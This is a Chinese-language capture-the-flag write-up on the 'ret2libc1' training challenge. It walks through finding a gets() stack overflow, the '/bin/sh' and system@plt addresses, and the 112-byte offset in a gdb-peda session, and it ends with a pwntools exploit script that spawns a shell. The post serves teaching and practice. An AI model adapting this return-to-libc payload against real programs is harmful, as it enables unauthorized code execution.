ret2libc1

Posted on | In | | Visitors:
Words count in article: 505 | Reading time ≈ 2

题目地址:ret2libc1

1.查看基本信息

文件信息

r2lbc1.png

查看保护

r2lbc2.png

查看ida反汇编

r2lbc3.png

2.定位漏洞及利用分析

ida可知,gets()函数存在栈溢出漏洞。但由于开启了堆栈不可执行保护,不能使用ret2shellcode的方法。但是存在system函数。

ret2libc

ret2libc 即控制函数的执行 libc 中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置(即函数对应的 got表项的内容)。一般情况下,我们会选择执行 system(“/bin/sh”),故而此时我们需要知道 system 函数的地址。

思路

1.寻找”/bin/sh”

首先要知道”/bin/sh”字符串的地址。

两种方法:

1.

r2lbc4.jpg

2.

5.png

binsh_addr = 0x08048720

2.寻找system函数在plt中的地址

r2lbc5.png

sys_plt = 0x08048460

3.计算溢出偏移量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
gdb-peda$ pattern create 150
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA'
gdb-peda$ r
Starting program: /home/hc/study/pwn/stackoverflow/ret2libc/ret2libc1/ret2libc1 
RET2LIBC >_<
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xf7fb45c0 --> 0xfbad2288 
EDX: 0xf7fb589c --> 0x0 
ESI: 0xf7fb4000 --> 0x1d4d6c 
EDI: 0x0 
EBP: 0x6941414d ('MAAi')
ESP: 0xffffce80 ("ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
EIP: 0x41384141 ('AA8A')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41384141
[------------------------------------stack-------------------------------------]
0000| 0xffffce80 ("ANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
0004| 0xffffce84 ("jAA9AAOAAkAAPAAlAAQAAmAARAAoAA")
0008| 0xffffce88 ("AAOAAkAAPAAlAAQAAmAARAAoAA")
0012| 0xffffce8c ("AkAAPAAlAAQAAmAARAAoAA")
0016| 0xffffce90 ("PAAlAAQAAmAARAAoAA")
0020| 0xffffce94 ("AAQAAmAARAAoAA")
0024| 0xffffce98 ("AmAARAAoAA")
0028| 0xffffce9c ("RAAoAA")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41384141 in ?? ()
gdb-peda$ pattern offset AA8A
AA8A found at offset: 112
gdb-peda$ pattern search
Registers contain pattern buffer:
EBP+0 found at offset: 108
EIP+0 found at offset: 112
Registers point to pattern buffer:
[ESP] --> offset 116 - size ~34
Pattern buffer found at:
0x0804b160 : offset    0 - size  150 ([heap])
0xffffce0c : offset    0 - size  150 ($sp + -0x74 [-29 dwords])
References to pattern buffer found at:
0xf7fb45cc : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45d0 : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45d4 : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45d8 : 0x0804b160 (/lib32/libc-2.27.so)
0xf7fb45dc : 0x0804b160 (/lib32/libc-2.27.so)
0xffffcc84 : 0x0804b160 ($sp + -0x1fc [-127 dwords])
0xffffcd54 : 0x0804b160 ($sp + -0x12c [-75 dwords])
0xffffcdcc : 0xffffce0c ($sp + -0xb4 [-45 dwords])
0xffffcdf0 : 0xffffce0c ($sp + -0x90 [-36 dwords])

得到基于eip的偏移112

3.编写exp

1
2
3
4
5
6
7
8
from pwn import *
p = process('./ret2libc1')
sys_plt_addr = 0x08048460
binsh_addr = 0x08048720
payload = 112*'A' + p32(sys_plt_addr) + p32(0xdeadbeef) + p32(binsh_addr)
p.recv()
p.sendline(payload)
p.interactive()

r2lbc6.png

0%
//这里改为从本地加载